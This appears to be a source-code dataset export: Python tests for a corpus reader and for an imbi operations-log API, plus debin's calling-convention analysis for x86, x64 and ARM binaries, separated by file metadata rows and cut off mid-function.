        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
        i = 0
        for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
            for row_dict in gen:
                #p(row_dict)
                #i+=1
                if row_dict == end_file_marker:
                    i+=1
                    continue
                assert isinstance(row_dict, dict)
                assert len(row_dict) == 6
                assert 'text' in row_dict
                assert 'star_constellation' in row_dict
                assert 'working_area' in row_dict
                assert 'age' in row_dict
                assert 'id' in row_dict
                assert 'gender' in row_dict
        assert number_of_found_files == i
    ###### parallel computing ######
    @attr(status='stable')
    #@wipd
    def test_getlazy_many_streams_from_txt_without_given_number_of_streams_adjusted_for_current_cpu_520(self):
        """Stream count is adjusted to the current CPU when adjust_to_cpu=True."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker, send_end_file_marker=True)
        number_of_found_files = reader._get_number_of_left_over_files()
        #p(number_of_found_files)
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
        # NOTE(review): the line below passes min_files_pro_stream=5 but
        # compares against get_number_of_streams_adjust_cpu(3, ..., 5) —
        # the arguments look transposed; confirm against the helper's signature.
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 5))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
        i = 0
        for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
            for row_dict in gen:
                if row_dict == end_file_marker:
                    i+=1
                    continue
                assert isinstance(row_dict, dict)
                assert len(row_dict) == 6
                assert 'text' in row_dict
                assert 'star_constellation' in row_dict
                assert 'working_area' in row_dict
                assert 'age' in row_dict
                assert 'id' in row_dict
                assert 'gender' in row_dict
        #p((number_of_found_files, i))
        assert number_of_found_files == i
    @attr(status='stable')
    #@wipd
    def test_getlazy_many_streams_from_txt_with_given_number_of_streams_without_adjust_for_current_cpu_521(self):
        """Exactly the requested stream count is returned when adjust_to_cpu=False."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker, send_end_file_marker=True)
        number_of_found_files = reader._get_number_of_left_over_files()
        #p(number_of_found_files)
        # Check for stream_number=3
        len(reader.getlazy(stream_number=3, adjust_to_cpu=False)).should.be.equal(3)
        len([rowdict for gen in reader.getlazy(stream_number=3, adjust_to_cpu=False) for rowdict in gen if end_file_marker == rowdict]).should.be.equal(number_of_found_files)
        # Check for stream_number=2
        #p(reader.getlazy(stream_number=2, adjust_to_cpu=False))
        len(reader.getlazy(stream_number=2, adjust_to_cpu=False)).should.be.equal(2)
        len([rowdict for gen in reader.getlazy(stream_number=2, adjust_to_cpu=False) for rowdict in gen if end_file_marker == rowdict]).should.be.equal(number_of_found_files)
        i = 0
        for gen, fname in zip(reader.getlazy(stream_number=3,adjust_to_cpu=False, min_files_pro_stream=1), reversed(reader.files_to_read_orig)):
            for row_dict in gen:
                if row_dict == end_file_marker:
                    i+=1
                    continue
                # Compare the streamed text against the raw file contents.
                t = codecs.open(fname, "r", encoding="utf-8").read()
                #p((row_dict["text"],t))
                assert row_dict["text"] == t
                assert isinstance(row_dict, dict)
                assert len(row_dict) == 6
                assert 'text' in row_dict
                assert 'star_constellation' in row_dict
                assert 'working_area' in row_dict
                assert 'age' in row_dict
                assert 'id' in row_dict
                assert 'gender' in row_dict
        assert number_of_found_files == i
    #################################END##################################################
    ############################EXTERN METHODS############################################
    ######################################################################################
    ####################################################################################################
    ####################################################################################################
    ###################### STOP STABLE TESTS #########################################################
    ####################################################################################################
    ####################################################################################################
    ####################################################################################################
    ####################################################################################################
    ###################### START WORK_IN_PROGRESS (wipd) TESTS #########################################
    ####################################################################################################
    ####################################################################################################
    ####################################################################################################
    ####################################################################################################
    ###################### STOP WORK_IN_PROGRESS (wipd) TESTS #########################################
    ####################################################################################################
    ####################################################################################################
| 40.031888
| 206
| 0.574415
| 3,865
| 31,385
| 4.340233
| 0.064424
| 0.045782
| 0.074396
| 0.057943
| 0.897824
| 0.887273
| 0.874098
| 0.872548
| 0.863368
| 0.840238
| 0
| 0.012496
| 0.237629
| 31,385
| 783
| 207
| 40.083014
| 0.688594
| 0.102246
| 0
| 0.851064
| 0
| 0
| 0.049319
| 0.000924
| 0
| 0
| 0
| 0
| 0.385343
| 1
| 0.056738
| false
| 0
| 0.030733
| 0
| 0.092199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
795b1dc32390651b8746d673af2715884a2d87f0
| 14,975
|
py
|
Python
|
tests/endpoints/test_operations_log.py
|
nvllsvm/imbi-api
|
1a5bd8894ac14c1026f33297994aa10782b0eea0
|
[
"BSD-3-Clause"
] | 1
|
2021-06-23T18:34:47.000Z
|
2021-06-23T18:34:47.000Z
|
tests/endpoints/test_operations_log.py
|
nvllsvm/imbi-api
|
1a5bd8894ac14c1026f33297994aa10782b0eea0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/endpoints/test_operations_log.py
|
nvllsvm/imbi-api
|
1a5bd8894ac14c1026f33297994aa10782b0eea0
|
[
"BSD-3-Clause"
] | 2
|
2022-02-11T22:06:18.000Z
|
2022-02-21T19:35:06.000Z
|
import json
import uuid
import jsonpatch
from ietfparse import headers
from imbi.endpoints import operations_log
from tests import base
class AsyncHTTPTestCase(base.TestCaseWithReset):
    """Functional tests for the /operations-log collection and record endpoints.

    Indentation was reconstructed from control flow after it was lost in
    extraction; the statement sequence is unchanged from the original.
    """

    ADMIN_ACCESS = True
    TRUNCATE_TABLES = [
        'v1.operations_log',
        'v1.projects',
        'v1.project_types',
        'v1.namespaces',
        'v1.environments',
    ]

    def setUp(self):
        super().setUp()
        self.environments = self.create_environments()
        self.environment = self.environments[0]
        self.namespace = self.create_namespace()
        self.project_type = self.create_project_type()
        self.project = self.create_project()

    def test_get_static_collection(self):
        """Paging forward and backward over a fixed set of 10 records."""
        records = []
        for i in range(10):
            record = {
                'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
                'recorded_at': '2021-08-30T00:00:00+00:00',
                'environment': self.environment,
                'project_id': self.project['id'],
                'change_type': 'Upgraded',
                'description': str(uuid.uuid4()),
                'link': str(uuid.uuid4()),
                'notes': str(uuid.uuid4()),
                'ticket_slug': str(uuid.uuid4()),
                'version': str(uuid.uuid4()),
            }
            records.append(record)
            result = self.fetch(
                '/operations-log', method='POST', headers=self.headers,
                body=json.dumps(record).encode('utf-8'))
            self.assertEqual(result.code, 200)
            records[i]['id'] = json.loads(result.body.decode('utf-8'))['id']
            records[i]['completed_at'] = None

        # page 1
        namespace_id = self.namespace['id']
        result = self.fetch(
            f'/operations-log?limit=4&namespace_id={namespace_id}',
            headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 4)
        for i in range(4):
            self.assertDictEqual(response[i], records[9 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link = None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            self.assertNotEqual(link_rel, 'previous')
            if link_rel == 'next':
                next_link = header.target
        self.assertIsNotNone(next_link)

        # page 2
        result = self.fetch(next_link, headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 4)
        for i in range(4):
            self.assertDictEqual(response[i], records[5 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link, previous_link = None, None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            if link_rel == 'next':
                next_link = header.target
            elif link_rel == 'previous':
                previous_link = header.target
        self.assertIsNotNone(next_link)
        self.assertIsNotNone(previous_link)

        # page 3
        result = self.fetch(next_link, headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 2)
        for i in range(2):
            self.assertDictEqual(response[i], records[1 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link, previous_link = None, None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            self.assertNotEqual(link_rel, 'next')
            if link_rel == 'previous':
                previous_link = header.target
        self.assertIsNotNone(previous_link)

        # page 2 (walking backward)
        result = self.fetch(previous_link, headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 4)
        for i in range(4):
            self.assertDictEqual(response[i], records[5 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link, previous_link = None, None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            if link_rel == 'next':
                next_link = header.target
            elif link_rel == 'previous':
                previous_link = header.target
        self.assertIsNotNone(next_link)
        self.assertIsNotNone(previous_link)

        # page 1 (walking backward)
        result = self.fetch(previous_link, headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 4)
        for i in range(4):
            self.assertDictEqual(response[i], records[9 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link = None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            self.assertNotEqual(link_rel, 'previous')
            if link_rel == 'next':
                next_link = header.target
        self.assertIsNotNone(next_link)

    def test_get_concurrently_updated_collection(self):
        """A record inserted mid-pagination must appear when paging back."""
        records = []
        for i in range(6):
            record = {
                'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
                'recorded_at': f'2021-08-30T00:00:0{i}+00:00',
                'environment': self.environment,
                'project_id': self.project['id'],
                'change_type': 'Upgraded',
                'description': str(uuid.uuid4()),
                'link': str(uuid.uuid4()),
                'notes': str(uuid.uuid4()),
                'ticket_slug': str(uuid.uuid4()),
                'version': str(uuid.uuid4()),
            }
            records.append(record)
            result = self.fetch(
                '/operations-log', method='POST', headers=self.headers,
                body=json.dumps(record).encode('utf-8'))
            self.assertEqual(result.code, 200)
            records[i]['id'] = json.loads(result.body.decode('utf-8'))['id']
            records[i]['completed_at'] = None

        # page 1
        result = self.fetch('/operations-log?limit=3', headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 3)
        for i in range(3):
            self.assertDictEqual(response[i], records[5 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link = None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            self.assertNotEqual(link_rel, 'previous')
            if link_rel == 'next':
                next_link = header.target
        self.assertIsNotNone(next_link)

        # page 2
        result = self.fetch(next_link, headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 3)
        for i in range(3):
            self.assertDictEqual(response[i], records[2 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link, previous_link = None, None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            self.assertNotEqual(link_rel, 'next')
            if link_rel == 'previous':
                previous_link = header.target
        self.assertIsNotNone(previous_link)

        # insert a record with a timestamp falling between existing ones
        record = {
            'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
            'recorded_at': '2021-08-30T00:00:03+00:00',
            'environment': self.environment,
            'project_id': self.project['id'],
            'change_type': 'Upgraded',
            'description': str(uuid.uuid4()),
            'link': str(uuid.uuid4()),
            'notes': str(uuid.uuid4()),
            'ticket_slug': str(uuid.uuid4()),
            'version': str(uuid.uuid4()),
        }
        result = self.fetch(
            '/operations-log', method='POST', headers=self.headers,
            body=json.dumps(record).encode('utf-8'))
        self.assertEqual(result.code, 200)
        record['id'] = json.loads(result.body.decode('utf-8'))['id']
        record['completed_at'] = None
        records.insert(4, record)

        # previous page (now page 2/3)
        result = self.fetch(previous_link, headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 3)
        for i in range(3):
            self.assertDictEqual(response[i], records[5 - i])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link, previous_link = None, None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            if link_rel == 'next':
                next_link = header.target
            elif link_rel == 'previous':
                previous_link = header.target
        self.assertIsNotNone(next_link)
        self.assertIsNotNone(previous_link)

        # previous page (now page 1/3)
        result = self.fetch(previous_link, headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        self.assertEqual(len(response), 1)
        self.assertDictEqual(response[0], records[6])
        link_headers = headers.parse_link(result.headers['Link'])
        next_link, previous_link = None, None
        for header in link_headers:
            link_rel = header.parameters[0][1]
            self.assertNotEqual(link_rel, 'previous')
            if link_rel == 'next':
                next_link = header.target
        self.assertIsNotNone(next_link)

    def test_operations_log_lifecycle(self):
        """Create, PATCH, GET, list, and DELETE a single record."""
        record = {
            'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
            'recorded_at': '2021-08-30T00:00:00+00:00',
            'environment': self.environment,
            'change_type': 'Upgraded',
            'description': str(uuid.uuid4()),
            'link': str(uuid.uuid4()),
            'notes': str(uuid.uuid4()),
            'ticket_slug': str(uuid.uuid4()),
            'version': str(uuid.uuid4()),
        }

        # Create
        result = self.fetch(
            '/operations-log', method='POST', headers=self.headers,
            body=json.dumps(record).encode('utf-8'))
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        url = self.get_url('/operations-log/{}'.format(response['id']))
        self.assert_link_header_equals(result, url)
        self.assertIsNotNone(result.headers['Date'])
        self.assertIsNone(result.headers.get('Last-Modified', None))
        self.assertEqual(
            result.headers['Cache-Control'], 'public, max-age={}'.format(
                operations_log.RecordRequestHandler.TTL))
        record.update({
            'id': response['id'],
            'completed_at': response['completed_at'],
            'project_id': response['project_id'],
        })
        self.assertDictEqual(response, record)

        # PATCH
        updated = dict(record)
        updated['description'] = str(uuid.uuid4())
        patch = jsonpatch.make_patch(record, updated)
        patch_value = patch.to_string().encode('utf-8')
        record.update({
            'description': updated['description'],
        })
        result = self.fetch(
            url, method='PATCH', body=patch_value, headers=self.headers)
        self.assertEqual(result.code, 200)
        self.assert_link_header_equals(result, url)
        response = json.loads(result.body.decode('utf-8'))
        self.assertDictEqual(response, record)

        # Patch no change
        result = self.fetch(
            url, method='PATCH', body=patch_value, headers=self.headers)
        self.assertEqual(result.code, 304)

        # GET
        result = self.fetch(url, headers=self.headers)
        self.assertEqual(result.code, 200)
        self.assert_link_header_equals(result, url)
        self.assertEqual(
            result.headers['Cache-Control'], 'public, max-age={}'.format(
                operations_log.RecordRequestHandler.TTL))
        response = json.loads(result.body.decode('utf-8'))
        self.assertDictEqual(response, record)

        # Collection
        result = self.fetch('/operations-log', headers=self.headers)
        self.assertEqual(result.code, 200)
        self.assertListEqual(
            json.loads(result.body.decode('utf-8')), [record])

        # DELETE
        result = self.fetch(url, method='DELETE', headers=self.headers)
        self.assertEqual(result.code, 204)

        # GET record should not exist
        result = self.fetch(url, headers=self.headers)
        self.assertEqual(result.code, 404)

        # DELETE should fail as record should not exist
        result = self.fetch(url, method='DELETE', headers=self.headers)
        self.assertEqual(result.code, 404)

    def test_create_with_missing_fields(self):
        """Optional fields may be omitted on create."""
        record = {
            'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
            'recorded_at': '2021-08-30T00:00:00+00:00',
            'environment': self.environment,
            'change_type': 'Upgraded',
        }
        result = self.fetch('/operations-log', method='POST',
                            body=json.dumps(record).encode('utf-8'),
                            headers=self.headers)
        self.assertEqual(result.code, 200)
        response = json.loads(result.body.decode('utf-8'))
        url = self.get_url('/operations-log/{}'.format(response['id']))
        self.assert_link_header_equals(result, url)
        self.assertEqual(response['environment'], record['environment'])
        self.assertEqual(response['change_type'], record['change_type'])

        # DELETE
        result = self.fetch(url, method='DELETE', headers=self.headers)
        self.assertEqual(result.code, 204)

        # GET record should not exist
        result = self.fetch(url, headers=self.headers)
        self.assertEqual(result.code, 404)

    def test_method_not_implemented(self):
        """Unsupported verbs on collection and record URLs return 405."""
        for method in {'DELETE', 'PATCH'}:
            result = self.fetch(
                '/operations-log', method=method,
                allow_nonstandard_methods=True,
                headers=self.headers)
            self.assertEqual(result.code, 405)

        url = '/operations-log/' + str(uuid.uuid4())
        result = self.fetch(url, method='POST',
                            allow_nonstandard_methods=True,
                            headers=self.headers)
        self.assertEqual(result.code, 405)
| 40.472973
| 76
| 0.581436
| 1,672
| 14,975
| 5.092703
| 0.0939
| 0.059425
| 0.066588
| 0.0734
| 0.843922
| 0.827011
| 0.81926
| 0.80047
| 0.798121
| 0.787082
| 0
| 0.026044
| 0.28975
| 14,975
| 369
| 77
| 40.582656
| 0.774539
| 0.018698
| 0
| 0.775316
| 0
| 0
| 0.099359
| 0.013698
| 0
| 0
| 0
| 0
| 0.237342
| 1
| 0.018987
| false
| 0
| 0.018987
| 0
| 0.047468
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79dc5fe8e4c0451b570f7832bd8fc8ae17f68de6
| 31,049
|
py
|
Python
|
py/elements/conventions.py
|
pombredanne/debin
|
9abb5215b54077da1e9479bfcbc56cd860aac370
|
[
"Apache-2.0"
] | 322
|
2018-12-06T03:32:37.000Z
|
2022-03-30T06:01:03.000Z
|
py/elements/conventions.py
|
pombredanne/debin
|
9abb5215b54077da1e9479bfcbc56cd860aac370
|
[
"Apache-2.0"
] | 20
|
2019-01-30T20:22:33.000Z
|
2022-01-24T11:40:37.000Z
|
py/elements/conventions.py
|
pombredanne/debin
|
9abb5215b54077da1e9479bfcbc56cd860aac370
|
[
"Apache-2.0"
] | 49
|
2019-02-13T00:25:19.000Z
|
2022-03-25T05:32:56.000Z
|
from common.constants import UNKNOWN_LABEL, INIT, FINI, X64_FUN_ARG_REGS, ARM_FUN_ARG_REGS, X86_SOCKETCALL_ARGS
from elements.regs import Reg, RegBase, GivReg
from elements.givs import IntConst, VirtualExp
from elements.elmfactory import mem_addr, make_reg, make_temp_offset
from elements.elmfactory import get_virtual_exp, make_giv_reg
from bap.vars import VirtualVar, RegVar, MemVar
from bap.exps import LoadExp, StoreExp, BinOpExp, IntExp
from bap.stmts import DefStmt, JmpStmt, CallKind, RetKind, DirectLabel, IndirectLabel
def x86_call_args(blk):
    """Recover stack-passed arguments for the call terminating *blk* (x86).

    Scans backwards for stores to [ESP/RSP + offset] and attaches a
    contiguous run of slots starting at offset 0 to the call's args.
    """
    if len(blk.bap.stmts) > 0:
        last_stmt_bap = blk.bap.stmts[-1]
        if isinstance(last_stmt_bap, JmpStmt) \
                and isinstance(last_stmt_bap.kind, CallKind):
            tmp_args = dict()
            call = last_stmt_bap
            for i in range(len(blk.bap.stmts) - 4, -1, -1):
                stmt = blk.bap.stmts[i]
                if isinstance(stmt, DefStmt):
                    lhs = stmt.lhs
                    rhs = stmt.rhs
                    if isinstance(lhs, MemVar) and isinstance(rhs, StoreExp):
                        addr = rhs.addr
                        exp = rhs.exp
                        base_pointer, offset, access = mem_addr(
                            addr, blk, stmt.pc)
                        if base_pointer is not None \
                                and not isinstance(exp, GivReg) \
                                and not isinstance(exp, VirtualVar) \
                                and base_pointer.base_register in ('ESP',
                                                                   'RSP'):
                            key = (base_pointer.base_register, offset)
                            # Keep only the store closest to the call.
                            if key not in tmp_args:
                                tmp_args[key] = (exp, stmt.pc)
            for base_pointer, offset in sorted(tmp_args.keys()):
                key = (base_pointer, offset)
                # Slots must form an unbroken run from offset 0 upward.
                if offset == 0 or \
                        (base_pointer,
                         offset - blk.binary.config.ADDRESS_BYTE_SIZE) \
                        in tmp_args:
                    exp, pc = tmp_args[key]
                    make_temp_offset(base_pointer, offset, blk, pc)
                    call.kind.args[key] = (exp, pc)
                else:
                    break


def x64_call_args(blk):
    """Recover register-passed arguments for the call terminating *blk* (x64)."""
    if len(blk.bap.stmts) > 0:
        last_stmt_bap = blk.bap.stmts[-1]
        if isinstance(last_stmt_bap, JmpStmt) \
                and isinstance(last_stmt_bap.kind, CallKind):
            call = last_stmt_bap
            for i in range(len(blk.bap.stmts) - 3, -1, -1):
                stmt = blk.bap.stmts[i]
                if isinstance(stmt, DefStmt):
                    lhs = stmt.lhs
                    rhs = stmt.rhs
                    if isinstance(lhs, RegVar) \
                            and lhs.name in X64_FUN_ARG_REGS:
                        key = lhs.name
                        # First definition found (closest to the call) wins.
                        if key not in call.kind.args:
                            make_giv_reg(lhs.name, lhs.index, blk, stmt.pc)
                            call.kind.args[key] = (rhs, stmt.pc)


def arm_call_args(blk):
    """Recover register-passed arguments for the call terminating *blk* (ARM)."""
    if len(blk.bap.stmts) > 0:
        last_stmt_bap = blk.bap.stmts[-1]
        if isinstance(last_stmt_bap, JmpStmt) \
                and isinstance(last_stmt_bap.kind, CallKind):
            call = last_stmt_bap
            for i in range(len(blk.bap.stmts) - 3, -1, -1):
                stmt = blk.bap.stmts[i]
                if isinstance(stmt, DefStmt):
                    lhs = stmt.lhs
                    rhs = stmt.rhs
                    if isinstance(lhs, RegVar) \
                            and lhs.name in ARM_FUN_ARG_REGS:
                        key = lhs.name
                        if key not in call.kind.args:
                            make_giv_reg(lhs.name, lhs.index, blk, stmt.pc)
                            call.kind.args[key] = (rhs, stmt.pc)


def call_args(blk):
    """Dispatch call-argument recovery by target architecture."""
    if blk.binary.config.MACHINE_ARCH == 'x86':
        x86_call_args(blk)
    elif blk.binary.config.MACHINE_ARCH == 'x64':
        x64_call_args(blk)
    elif blk.binary.config.MACHINE_ARCH == 'ARM':
        arm_call_args(blk)
def x86_prologue(blk):
    """Mark registers saved by PUSH instructions in the function prologue (x86)."""
    for stmt in blk.bap.stmts:
        if stmt.insn is not None \
                and stmt.insn.startswith('PUSH') \
                and isinstance(stmt.lhs, MemVar) \
                and isinstance(stmt.rhs, StoreExp):
            if isinstance(stmt.rhs.exp, RegVar):
                make_giv_reg(stmt.rhs.exp.name, stmt.rhs.exp.index,
                             blk, stmt.pc)
            elif isinstance(stmt.rhs.exp, VirtualVar) \
                    and isinstance(get_virtual_exp(stmt.rhs.exp, blk).exp,
                                   RegVar):
                # The pushed value is a virtual temp holding a register.
                virtual_exp = get_virtual_exp(stmt.rhs.exp, blk)
                reg = virtual_exp.exp
                make_giv_reg(reg.name, reg.index, blk, stmt.pc)
                make_giv_reg(reg.name, reg.index, blk, virtual_exp.pc)


def x64_prologue(blk):
    """x64 prologues use the same PUSH pattern as x86."""
    x86_prologue(blk)


def arm_prologue(blk):
    """Mark SP-relative saves at the function entry point (ARM)."""
    for stmt in blk.bap.stmts:
        # NOTE(review): the loop-exit placement was reconstructed; assuming
        # the scan stops at the first stmt past the entry pc — confirm
        # against upstream.
        if stmt.pc is not None \
                and stmt.pc == blk.function.low_pc \
                and isinstance(stmt, DefStmt) \
                and isinstance(stmt.lhs, MemVar) \
                and isinstance(stmt.rhs, StoreExp) \
                and isinstance(stmt.rhs.exp, RegVar):
            base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk,
                                                    stmt.pc)
            if base_pointer is not None \
                    and base_pointer.base_register == 'SP':
                make_temp_offset(base_pointer.base_register, offset,
                                 blk, stmt.pc)
                make_giv_reg(stmt.rhs.exp.name, stmt.rhs.exp.index,
                             blk, stmt.pc)
        else:
            break


def prologue(blk):
    """Dispatch prologue analysis by target architecture."""
    if blk.binary.config.MACHINE_ARCH == 'x86':
        x86_prologue(blk)
    elif blk.binary.config.MACHINE_ARCH == 'x64':
        x64_prologue(blk)
    elif blk.binary.config.MACHINE_ARCH == 'ARM':
        arm_prologue(blk)
def x86_epilogue(blk):
    """Mark registers restored by POP from [ESP + offset] (x86)."""
    for stmt in blk.bap.stmts:
        if stmt.insn is not None \
                and stmt.insn.startswith('POP') \
                and isinstance(stmt, DefStmt) \
                and isinstance(stmt.lhs, RegVar) \
                and isinstance(stmt.rhs, LoadExp):
            base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk,
                                                    stmt.pc)
            if base_pointer is not None \
                    and base_pointer.base_register == 'ESP':
                make_temp_offset(base_pointer.base_register, offset,
                                 blk, stmt.pc)
                make_giv_reg(stmt.lhs.name, stmt.lhs.index, blk, stmt.pc)


def x64_epilogue(blk):
    """Mark registers restored by POP from [RSP + offset] (x64)."""
    for stmt in blk.bap.stmts:
        if stmt.insn is not None \
                and stmt.insn.startswith('POP') \
                and isinstance(stmt, DefStmt) \
                and isinstance(stmt.lhs, RegVar) \
                and isinstance(stmt.rhs, LoadExp):
            base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk,
                                                    stmt.pc)
            if base_pointer is not None \
                    and base_pointer.base_register == 'RSP':
                make_temp_offset(base_pointer.base_register, offset,
                                 blk, stmt.pc)
                make_giv_reg(stmt.lhs.name, stmt.lhs.index, blk, stmt.pc)


def arm_epilogue(blk):
    """Mark SP-relative restores before a return (ARM).

    Requires the block to end with a return preceded by an SP adjustment
    (SP = SP + const); then scans backwards over contiguous loads from SP.
    """
    if len(blk.bap.stmts) > 1:
        last_stmt = blk.bap.stmts[-1]
        if isinstance(last_stmt, JmpStmt) \
                and isinstance(last_stmt.kind, RetKind):
            stmt = blk.bap.stmts[-2]
            if isinstance(stmt.lhs, RegVar) \
                    and stmt.lhs.name == 'SP' \
                    and isinstance(stmt.rhs, BinOpExp) \
                    and isinstance(stmt.rhs.e1, RegVar) \
                    and isinstance(stmt.rhs.e2, IntExp) \
                    and stmt.rhs.e1.name == 'SP':
                for i in range(len(blk.bap.stmts) - 3, -1, -1):
                    stmt = blk.bap.stmts[i]
                    if isinstance(stmt, DefStmt) \
                            and isinstance(stmt.lhs, RegVar) \
                            and isinstance(stmt.rhs, LoadExp):
                        base_pointer, offset, access = mem_addr(
                            stmt.rhs.addr, blk, stmt.pc)
                        if base_pointer is not None \
                                and base_pointer.base_register == 'SP':
                            make_temp_offset(base_pointer.base_register,
                                             offset, blk, stmt.pc)
                            make_giv_reg(stmt.lhs.name, stmt.lhs.index,
                                         blk, stmt.pc)
                        else:
                            break
                    else:
                        break


def epilogue(blk):
    """Dispatch epilogue analysis by target architecture."""
    if blk.binary.config.MACHINE_ARCH == 'x86':
        x86_epilogue(blk)
    elif blk.binary.config.MACHINE_ARCH == 'x64':
        x64_epilogue(blk)
    elif blk.binary.config.MACHINE_ARCH == 'ARM':
        arm_epilogue(blk)
def x86_infer_functions(functions):
    """Name well-known runtime functions for x86 binaries.

    Identifies _init/_fini from section addresses, _start from the entry
    point, and main/__libc_csu_init/__libc_csu_fini from the stack-pushed
    arguments of the __libc_start_main call inside _start.
    """
    if functions.binary.sections.has_sec(INIT):
        init_sec_addr = functions.binary.sections.get_sec(INIT).addr
        if functions.is_lowpc_function(init_sec_addr):
            _init = functions.get_function_by_lowpc(init_sec_addr)
            _init.name = '_init'
            _init.train_name = '_init'
            _init.test_name = '_init'
            _init.is_name_given = True
            _init.is_run_init = False
    if functions.binary.sections.has_sec(FINI):
        fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
        if functions.is_lowpc_function(fini_sec_addr):
            _fini = functions.get_function_by_lowpc(fini_sec_addr)
            _fini.name = '_fini'
            _fini.train_name = '_fini'
            _fini.test_name = '_fini'
            _fini.is_name_given = True
            _fini.is_run_init = False
    if functions.is_lowpc_function(functions.binary.entry_point):
        _start = functions.get_function_by_lowpc(
            functions.binary.entry_point)
        _start.name = '_start'
        _start.train_name = '_start'
        _start.test_name = '_start'
        _start.is_name_given = True
        _start.is_run_init = False
        for blk_bap in _start.bap.blks:
            stmts = blk_bap.stmts
            for i in range(len(stmts) - 1, -1, -1):
                stmt = stmts[i]
                if isinstance(stmt, JmpStmt) \
                        and isinstance(stmt.kind, CallKind) \
                        and isinstance(stmt.kind.target, DirectLabel):
                    target_tid = stmt.kind.target.target_tid
                    called_f = functions.get_function_by_tid(target_tid)
                    if called_f is not None \
                            and called_f.name == '__libc_start_main' \
                            and i > 0:
                        # Stack pushes before the call carry, in scan
                        # order: main, __libc_csu_init, __libc_csu_fini.
                        main_pc = None
                        init_pc = None
                        fini_pc = None
                        for j in range(i - 2, -1, -1):
                            stmt = stmts[j]
                            if isinstance(stmt, DefStmt) \
                                    and isinstance(stmt.lhs, MemVar) \
                                    and isinstance(stmt.rhs, StoreExp) \
                                    and isinstance(stmt.rhs.exp, IntExp) \
                                    and functions.is_lowpc_function(
                                        stmt.rhs.exp.value):
                                pc = stmt.rhs.exp.value
                                if main_pc is None:
                                    main_pc = pc
                                    main = functions.get_function_by_lowpc(
                                        main_pc)
                                    # NOTE(review): nesting of the MODE
                                    # check was lost in extraction; assuming
                                    # only the display name is overridden in
